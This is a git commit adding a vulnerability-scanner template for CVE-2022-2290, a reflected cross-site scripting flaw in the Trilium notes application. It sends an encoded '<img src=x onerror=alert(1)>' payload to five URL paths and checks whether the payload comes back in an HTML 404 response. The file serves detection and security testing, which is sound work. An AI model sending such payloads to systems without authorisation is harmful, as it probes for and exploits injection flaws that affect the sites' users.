Added CVE-2022-2290 Template

2022-07-05 21:53:31 +02:00 · 2022-07-05 21:53:31 +02:00 · ce9186ff16
parent e11930502e
commit ce9186ff16
1 changed files with 35 additions and 0 deletions
--- a/cves/2022/CVE-2022-2290.yaml
+++ b/cves/2022/CVE-2022-2290.yaml
@ -0,0 +1,35 @@
+id: CVE-2022-2290
+
+info:
+  name: Trilium - Reflected Cross-Site Scripting (CVE-2022-2290)
+  author: dbrwsky
+  severity: medium
+  description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-2290
+    - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/
+    - https://github.com/zadam/trilium
+  tags: xss,trilium,cve
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(1)%3E'
+      - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E'
+      - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/download'
+      - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(1)%3E/filename'
+      - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/view'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 404
+      - type: word
+        words:
+          - '<img src=x onerror=alert(1)>'
+        part: body
+      - type: word
+        words:
+          - "text/html"
+        part: header